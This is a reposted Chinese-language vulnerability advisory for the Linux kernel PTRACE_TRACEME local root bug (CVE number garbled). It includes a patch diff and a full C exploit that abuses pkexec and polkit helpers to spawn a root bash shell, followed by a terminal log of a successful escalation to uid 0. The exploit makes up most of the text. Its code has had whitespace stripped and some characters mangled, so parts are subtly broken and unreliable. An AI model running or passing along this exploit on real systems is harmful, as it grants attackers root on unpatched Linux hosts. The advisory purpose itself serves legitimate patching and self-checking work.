1200字范文 > 漏洞预警|Linux内核本地提权漏洞分析(CVE--13272)

漏洞预警|Linux内核本地提权漏洞分析(CVE--13272)

时间：2020-11-06 00:58:19

漏洞描述

近日，HSCERT监测发现Linux修复了一个本地内核提权漏洞，利用此漏洞，攻击者可将普通用户权限提升为Root权限。

HSCERT研判此漏洞为严重漏洞，攻击者拿到本地权限可以直接提权至root。

漏洞分析

当调用PTRACE_TRACEME时，ptrace_link将获得对父级目标凭据的RCU引用，然后把该指针指向get_cred函数。但是，对象struct cred的生存周期不允许无条件地将RCU引用转换为一个长期稳定的引用。

PTRACE_TRACEME获取父进程的凭证，使其能够像父进程一样执行父进程能够执行的各种操作。

但是，如果是恶意的没有特权的子进程使用PTRACE_TRACEME，该子进程可获取其父进程的控制权并且使用其父进程的权限调用execve函数创建一个新的高权限进程，可以使用ptrace suid文件并获取root权限。

下面是补丁对比代码，通过一直记录进程的凭据可以修复这个漏洞：

@@-79,9+79,7@@void__ptrace_link（structtask_struct*child，structtask_struct*new_parent，*/staticvoidptrace_link（structtask_struct*child，structtask_struct*new_parent）{- rcu_read_lock;-__ptrace_link（child，new_parent，__task_cred（new_parent））;-rcu_read_unlock;+__ptrace_link（child，new_parent，current_cred）;}/**

验证poc如下，可用于自检：

#define_GNU_SOURCE#include<string.h>#include<stdlib.h>#include<unistd.h>#include<signal.h>#include<stdio.h>#include<fcntl.h>#include<sched.h>#include<stddef.h>#include<stdarg.h>#include<pwd.h>#include<sys/prctl.h>#include<sys/wait.h>#include<sys/ptrace.h>#include<sys/user.h>#include<sys/syscall.h>#include<sys/stat.h>#include<linux/elf.h>#defineDEBUG#ifdefDEBUG#definedprintfprintf#else#definedprintf#endif#defineSAFE(expr)({\typeof(expr)__res=(expr);\if(__res==-1){\dprintf("[-]Error:%s\n",#expr);\return0;\}\__res;\})#definemax(a,b)((a)>(b)?(a):(b))staticconstchar*SHELL="/bin/bash";staticintmiddle_success=1;staticintblock_pipe[2];staticintself_fd=-1;staticintdummy_status;staticconstchar*helper_path;staticconstchar*pkexec_path="/usr/bin/pkexec";staticconstchar*pkaction_path="/usr/bin/pkaction";structstatst;constchar*helpers[1024];constchar*known_helpers[]={"/usr/lib/gnome-settings-daemon/gsd-backlight-helper","/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper","/usr/lib/unity-settings-daemon/usd-backlight-helper","/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper","/usr/sbin/mate-power-backlight-helper","/usr/bin/xfpm-power-backlight-helper","/usr/bin/lxqt-backlight_backend","/usr/libexec/gsd-wacom-led-helper","/usr/libexec/gsd-wacom-oled-helper","/usr/libexec/gsd-backlight-helper","/usr/lib/gsd-backlight-helper","/usr/lib/gsd-wacom-led-helper","/usr/lib/gsd-wacom-oled-helper",};/*temporaryprintf;returnedpointerisvaliduntilnexttprintf*/staticchar*tprintf(char*fmt,...){staticcharbuf[10000];va_listap;va_start(ap,fmt);vsprintf(buf,fmt,ap);va_end(ap);returnbuf;}/**fork,executepkexecinparent,forceparenttotraceourchildprocess,*executesuidexecutable(pkexec)inchild.*/staticintmiddle_main(void*dummy){prctl(PR_SET_PDEATHSIG,SIGKILL);pid_tmiddle=getpid();self_fd=SAFE(open("/proc/self/exe",O_RDONLY));pid_tchild=SAFE(fork());if(child==0){prctl(PR_SET_PDEATHSIG,SIGKILL);SAFE(dup2(self_fd,42));/*spinuntilourparentbecomesprivileged(havetobefasthere)*/intproc_fd=SAFE(open(tprintf("/proc/%d/status",middle),O_RDONLY));char*needle=tprintf("\nUid:\t%d\t0\t",getuid());while(1){charbuf[1000];ssize_tbuflen=SAFE(pread(proc_fd,buf,sizeof(buf)-1,0));buf[buflen]="\0";if(strstr(buf,needle))break;}/**thisiswherethebugistriggered.*whileourparentisinthemiddleofpkexec,weforceittobecomeour*tracer,withpkexec"scredsasptracer_cred.*/SAFE(ptrace(PTRACE_TRACEME,0,NULL,NULL));/**nowweexecuteasuidexecutable(pkexec).*Becausetheptracerelationshipisconsideredtobeprivileged,*thisisapropersuidexecutiondespitetheattachedtracer,*notadegradedone.*attheendofexecve(),thisprocessreceivesaSIGTRAPfromptrace.*/execl(pkexec_path,basename(pkexec_path),NULL);dprintf("[-]execl:Executingsuidexecutablefailed");exit(EXIT_FAILURE);}SAFE(dup2(self_fd,0));SAFE(dup2(block_pipe[1],1));/*executepkexecascurrentuser*/structpasswd*pw=getpwuid(getuid());if(pw==NULL){dprintf("[-]getpwuid:Failedtoretrieveusername");exit(EXIT_FAILURE);}middle_success=1;execl(pkexec_path,basename(pkexec_path),"--user",pw->pw_name,helper_path,"--help",NULL);middle_success=0;dprintf("[-]execl:Executingpkexecfailed");exit(EXIT_FAILURE);}/*ptracepidandwaitforsignal*/staticintforce_exec_and_wait(pid_tpid,intexec_fd,char*arg0){structuser_regs_structregs;structioveciov={.iov_base=&regs,.iov_len=sizeof(regs)};SAFE(ptrace(PTRACE_SYSCALL,pid,0,NULL));SAFE(waitpid(pid,&dummy_status,0));SAFE(ptrace(PTRACE_GETREGSET,pid,NT_PRSTATUS,&iov));/*setupindirectarguments*/unsignedlongscratch_area=(regs.rsp-0x1000)&~0xfffUL;structinjected_page{unsignedlongargv[2];unsignedlongenvv[1];chararg0[8];charpath[1];}ipage={.argv={scratch_area+offsetof(structinjected_page,arg0)}};strcpy(ipage.arg0,arg0);for(inti=0;i<sizeof(ipage)/sizeof(long);i++){unsignedlongp>long*)&ipage)[i];SAFE(ptrace(PTRACE_POKETEXT,pid,scratch_area+i*sizeof(long),(void*)pdata));}/*execveat(exec_fd,path,argv,envv,flags)*/regs.orig_rax=__NR_execveat;regs.rdi=exec_fd;regs.rsi=scratch_area+offsetof(structinjected_page,path);regs.rdx=scratch_area+offsetof(structinjected_page,argv);regs.r10=scratch_area+offsetof(structinjected_page,envv);regs.r8=AT_EMPTY_PATH;SAFE(ptrace(PTRACE_SETREGSET,pid,NT_PRSTATUS,&iov));SAFE(ptrace(PTRACE_DETACH,pid,0,NULL));SAFE(waitpid(pid,&dummy_status,0));}staticintmiddle_stage2(void){/*ourchildishanginginsignaldeliveryfromexecve()"sSIGTRAP*/pid_tchild=SAFE(waitpid(-1,&dummy_status,0));force_exec_and_wait(child,42,"stage3");return0;}//****************rootshell*****************staticintspawn_shell(void){SAFE(setresgid(0,0,0));SAFE(setresuid(0,0,0));execlp(SHELL,basename(SHELL),NULL);dprintf("[-]execlp:Executingshell%sfailed",SHELL);exit(EXIT_FAILURE);}//*****************Detect******************staticintcheck_env(void){constchar*xdg_session=getenv("XDG_SESSION_ID");dprintf("[.]Checkingenvironment...\n");if(stat(pkexec_path,&st)!=0){dprintf("[-]Couldnotfindpkexecexecutableat%s",pkexec_path);exit(EXIT_FAILURE);}if(stat(pkaction_path,&st)!=0){dprintf("[-]Couldnotfindpkactionexecutableat%s",pkaction_path);exit(EXIT_FAILURE);}if(xdg_session==NULL){dprintf("[!]Warning:$XDG_SESSION_IDisnotset\n");return1;}if(system("/bin/loginctl--no-ask-passwordshow-session$XDG_SESSION_ID|/bin/grepRemote=no>>/dev/null2>>/dev/null")!=0){dprintf("[!]Warning:CouldnotfindactivePolKitagent\n");return1;}if(stat("/usr/sbin/getsebool",&st)==0){if(system("/usr/sbin/getsebooldeny_ptrace2>1|/bin/grep-qon")==0){dprintf("[!]Warning:SELinuxdeny_ptraceisenabled\n");return1;}}dprintf("[~]Done,looksgood\n");return0;}/**UsepkactiontosearchPolKitpolicyactionsforviablehelperexecutables.*Checkeachactionforallow_active=yes,extracttheassociatedhelperpath,*andcheckthehelperpathexists.*/intfind_helpers(){charcmd[1024];snprintf(cmd,sizeof(cmd),"%s--verbose",pkaction_path);FILE*fp;fp=popen(cmd,"r");if(fp==NULL){dprintf("[-]Failedtorun:%s\n",cmd);exit(EXIT_FAILURE);}charline[1024];charbuffer[2048];inthelper_index=0;intuseful_action=0;staticconstchar*needle="org.freedesktop.policykit.exec.path->";intneedle_length=strlen(needle);while(fgets(line,sizeof(line)-1,fp)!=NULL){/*checktheactionusesallow_active=yes*/if(strstr(line,"implicitactive:")){if(strstr(line,"yes")){useful_action=1;}continue;}if(useful_action==0)continue;useful_action=0;/*extractthehelperpath*/intlength=strlen(line);char*found=memmem(&line[0],length,needle,needle_length);if(found==NULL)continue;memset(buffer,0,sizeof(buffer));for(inti=0;found[needle_length+i]!="\n";i++){if(i>=sizeof(buffer)-1)continue;buffer[i]=found[needle_length+i];}if(strstr(&buffer[0],"/xf86-video-intel-backlight-helper")!=0||strstr(&buffer[0],"/cpugovctl")!=0||strstr(&buffer[0],"/package-system-locked")!=0||strstr(&buffer[0],"/cddistupgrader")!=0){dprintf("[.]Ignoringblacklistedhelper:%s\n",&buffer[0]);continue;}/*checkthepathexists*/if(stat(&buffer[0],&st)!=0)continue;helpers[helper_index]=strndup(&buffer[0],strlen(buffer));helper_index++;if(helper_index>=sizeof(helpers)/sizeof(helpers[0]))break;}pclose(fp);return0;}//*****************Main*****************intptrace_traceme_root(){dprintf("[.]Usinghelper:%s\n",helper_path);/**setupapipesuchthatthenextwritetoitwillblock:packetmode,*limitedtoonepacket*/SAFE(pipe2(block_pipe,O_CLOEXEC|O_DIRECT));SAFE(fcntl(block_pipe[0],F_SETPIPE_SZ,0x1000));chardummy=0;SAFE(write(block_pipe[1],&dummy,1));/*spawnpkexecinachild,andcontinuehereonceourchildisinexecve()*/dprintf("[.]Spawningsuidprocess(%s)...\n",pkexec_path);staticcharmiddle_stack[1024*1024];pid_tmidpid=SAFE(clone(middle_main,middle_stack+sizeof(middle_stack),CLONE_VM|CLONE_VFORK|SIGCHLD,NULL));if(!middle_success)return1;/**waitforourchildtogothroughbothexecve()calls(firstpkexec,then*theexecutablepermittedbypolkitpolicy).*/while(1){intfd=open(tprintf("/proc/%d/comm",midpid),O_RDONLY);charbuf[16];intbuflen=SAFE(read(fd,buf,sizeof(buf)-1));buf[buflen]="\0";*strchrnul(buf,"\n")="\0";if(strncmp(buf,basename(helper_path),15)==0)break;usleep(100000);}/**ourchildshouldhavegonethroughboththeprivilegedexecve()andthe*followingexecve()here*/dprintf("[.]Tracingmidpid...\n");SAFE(ptrace(PTRACE_ATTACH,midpid,0,NULL));SAFE(waitpid(midpid,&dummy_status,0));dprintf("[~]Attachedtomidpid\n");force_exec_and_wait(midpid,0,"stage2");exit(EXIT_SUCCESS);}intmain(intargc,char**argv){if(strcmp(argv[0],"stage2")==0)returnmiddle_stage2();if(strcmp(argv[0],"stage3")==0)returnspawn_shell();dprintf("Linux4.10<5.1.17PTRACE_TRACEMElocalroot(CVE--13272)\n");check_env();if(argc>1&&strcmp(argv[1],"check")==0){exit(0);}/*Searchforknownhelpersdefinedin"known_helpers"array*/dprintf("[.]Searchingforknownhelpers...\n");for(inti=0;i<sizeof(known_helpers)/sizeof(known_helpers[0]);i++){if(stat(known_helpers[i],&st)==0){helper_path=known_helpers[i];dprintf("[~]Foundknownhelper:%s\n",helper_path);ptrace_traceme_root();}}/*Searchpolkitpoliciesforhelperexecutables*/dprintf("[.]Searchingforusefulhelpers...\n");find_helpers();for(inti=0;i<sizeof(helpers)/sizeof(helpers[0]);i++){if(helpers[i]==NULL)break;if(stat(helpers[i],&st)==0){helper_path=helpers[i];ptrace_traceme_root();}}return0;}

漏洞复现：

╭─birdpwn@ubuntu~/CVE--13272╰─$iduid=1000(birdpwn)gid=1000(birdpwn)groups=1000(birdpwn)╭─birdpwn@ubuntu~/CVE--13272╰─$gcc-spoc.c-optrace_traceme_root1↵╭─birdpwn@ubuntu~/CVE--13272╰─$lspoc.cptrace_traceme_root╭─birdpwn@ubuntu~/CVE--13272╰─$./ptrace_traceme_rootLinux4.10<5.1.17PTRACE_TRACEMElocalroot(CVE--13272)[.]Checkingenvironment...[~]Done,looksgood[.]Searchingforknownhelpers...[~]Foundknownhelper:/usr/lib/unity-settings-daemon/usd-backlight-helper[.]Usinghelper:/usr/lib/unity-settings-daemon/usd-backlight-helper[.]Spawningsuidprocess(/usr/bin/pkexec)...[.]Tracingmidpid...[~]Attachedtomidpidroot@ubuntu:/home/CVE--13272#iduid=0(root)gid=0(root)groups=0(root)

漏洞危害

严重

影响版本

目前受影响的Linux内核版本：

Linux Kernel < 5.1.17

以下产品均受到影响：

Ubuntu 16.04.5 kernel 4.15.0-29-generic

Ubuntu 18.04.1 kernel 4.15.0-20-generic

Ubuntu 19.04 kernel 5.0.0-15-generic

Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic

Linux Mint 19 kernel 4.15.0-20-generic

Xubuntu 16.04.4 kernel 4.13.0-36-generic